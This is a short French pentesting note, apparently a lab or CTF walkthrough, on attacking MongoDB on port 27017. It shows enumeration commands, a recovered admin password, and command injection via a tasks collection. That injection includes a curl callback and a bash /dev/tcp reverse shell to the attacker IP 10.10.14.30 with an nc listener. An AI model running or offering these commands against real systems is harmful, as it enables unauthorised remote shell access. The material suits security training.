Port 27017 - MongoDB Pentesting

Mongo Database Enumeration

Connexion à la base de données MongoDB (port 27017 ouvert) :

mongo
show dbs
use blog
show tables
db.users.find()

user: admin
password : IppsecSaysPleaseSubscribe

Mongo DB RCE

Le script app.js exécute des commandes système provenant des documents MongoDB (via doc.cmd). Cela présente une vulnérabilité critique, car des commandes arbitraires peuvent être injectées et exécutées.

Pour confirmer que nous pouvons exécuter des commandes via MongoDB

Créer un serveur web local

Sur la machine attaquante, lancez un serveur web pour observer les requêtes :

python3 -m http.server 80

Insérer une commande de test dans la collection tasks

Dans MongoDB, insérez une commande qui effectue une requête HTTP vers votre machine attaquante

db.tasks.insert({  cmd: "curl http://10.10.14.30"})

Observer les requêtes

Si vous voyez une requête dans les logs du serveur web, cela confirme que les commandes sont exécutées.

on lance un revrselll

on se met en ecoute port 443

nc -nlvp 443

Lancer un Reverse Shell

Configurer un écouteur sur le port 443 Sur la machine attaquante :

nc -nlvp 443

Insérer une commande de reverse shell

Dans MongoDB, insérez une commande pour établir un reverse shell :

db.tasks.insert({  cmd: "bash -c 'bash -i >&/dev/tcp/10.10.14.30/443 0>&1'"})

Connexion réussie Une fois la commande exécutée, vous obtenez un shell interactif sur la machine cible sous l'utilisateur tom.

Mis à jour il y a 8 mois

Ce contenu vous a-t-il été utile ?